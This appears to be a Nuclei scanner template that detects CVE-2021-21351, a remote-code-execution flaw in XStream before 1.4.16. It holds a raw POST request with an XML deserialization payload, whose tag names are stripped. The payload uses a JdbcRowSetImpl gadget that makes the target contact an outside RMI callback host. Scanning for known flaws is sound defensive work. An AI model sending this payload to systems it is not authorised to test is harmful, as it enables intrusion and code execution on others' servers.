id: CVE-2021-21351 info: name: XStream <1.4.16 - Remote Code Execution author: pwnhxl severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351 - https://x-stream.github.io/CVE-2021-21351.html - https://paper.seebug.org/1543/ - http://x-stream.github.io/changes.html#1.4.16 - https://nvd.nist.gov/vuln/detail/CVE-2021-21351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 epss-score: 0.93863 epss-percentile: 0.98868 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve,cve2021,xstream,deserialization,rce,oast,vulhub http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml ysomap -10086 <__overrideDefaultParser>false false false false false 1008 true 1000 0 2 0 0 0 true 1004 false rmi://{{interactsh-url}}/test com.sun.rowset.JdbcRowSetImpl setAutoCommit boolean false false false -1 false false 1 1 false ysomap test matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "timestamp" - "com.thoughtworks.xstream" condition: or - type: word part: header words: - "application/json" - type: status status: - 500 # digest: 4a0a0047304502206a998c1ad4a57615b79791982e7cbf77f6ca6d91a646ab26e1473216cd8d7e34022100a10d2f96fd8b3d6a10f3be0454580857f4851c93795cb2498c002b2694a37d5f:922c64590222798bb761d5b6d8e72950